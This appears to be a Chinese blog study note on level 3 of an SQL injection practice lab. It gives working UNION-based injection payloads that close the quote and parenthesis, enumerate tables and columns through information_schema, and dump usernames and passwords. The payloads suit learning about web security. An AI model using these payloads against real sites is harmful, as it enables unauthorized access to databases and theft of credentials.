当前位置: 首页 > news >正文

sql注入第三关

news 2026/6/24 21:44:10


这不仅需要手动闭合单引号还得手动闭合但括号。

可以猜测出原本的sql查询语句为:select * from table where id = ('$id');

所以我们插入的内容到sql语句后为:('1')--+')

整理之前学习的sql注入思路:
1、通过get手动传参,判断是否有查询数据库的操作。

2、判断是否存在注入点。输入1,能查;输入1',报错;输入1'--+能查,则存在字符型注入。如果是存在数值型注入,输入带有单引号或者双引号则会存在报错,直接注入即可。

3、判断当前 查询语句能返回多少列结果,使用order by 数字判断。然后将参数值设置为不合理的值如-1,爆出显示位。
4、然后就可以做联合查询了如:/id=-1' union select 1,database(),version()--+(爆出当前使用数据库名如security)
5、爆出档期按数据库名后,就可以利用mysql的information_schema数据库(相当目录系统)里的tables表和columns爆出security的表表名,表里对应的字段名.
?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
6、查询数据
?id=-1' union select 1,2,group_concat(username ,id , password) from users--+

http://www.cnnetsun.cn/news/54514.html

相关文章:

  • Unity反向遮罩黑科技:彻底颠覆传统UI设计思维
  • 3大技巧玩转Equalizer APO:从入门到精通的音频增强终极指南
  • 10分钟精通AMD处理器调试:SMU工具的完整使用指南
  • GridPlayer终极指南:轻松实现多视频同步播放的免费神器
  • 如何用OneMore插件实现终极笔记管理:开源免费的效率神器
  • Bilibili-Evolved终极评测:从基础体验到专业玩家的全面升级指南
  • ubuntu常用命令
  • wvp-GB28181-pro国标视频平台完整使用教程:从零搭建到实战应用
  • 终极指南:LXMusic音源全面解析与使用技巧
  • GridPlayer:免费开源的多视频网格播放器终极解决方案
  • Terraria地图编辑器终极使用指南:5步轻松打造完美游戏世界
  • iStore插件中心终极指南:5步轻松搞定OpenWRT插件安装与管理
  • OneMore插件:让OneNote效率提升10倍的神器
  • 终极指南:快速上手轻量级文本转语音引擎eSpeak NG
  • 云顶之弈智能挂机助手:解放双手的自动化游戏神器
  • 图像分割标注转换:从入门到精通的全方位指南
  • 3步精通Draw.io Mermaid插件:小白也能快速上手的文本转图表神器
  • 12.14周报
  • 3分钟掌握Easy-Scraper:零基础网页数据抓取神器
  • 飞书文档批量导出终极指南:告别手动烦恼,实现高效迁移
  • SuperCom串口调试工具:终极免费解决方案与5分钟快速部署指南
  • Vulkan显存检测利器:memtest_vulkan快速验证显卡稳定性
  • 揭秘BlenderGIS:5分钟搞定专业级地形生成的秘密武器
  • 终极Mac桌面歌词神器LyricsX完整使用指南
  • TranslucentTB中文版下载安装保姆级教程(附安装包,非常详细)
  • 3分钟轻松退出Windows Insider计划:OfflineInsiderEnroll离线工具完全指南
  • 为什么需要多智能体?
  • openMES制造执行系统:5步快速部署完整指南
  • 万元级旗舰值不值?三星三折叠价格和功能深度拆解
  • 专科生必看!告别熬夜赶论文!paperxie1小时搞定毕业设计初稿,导师直呼“专业”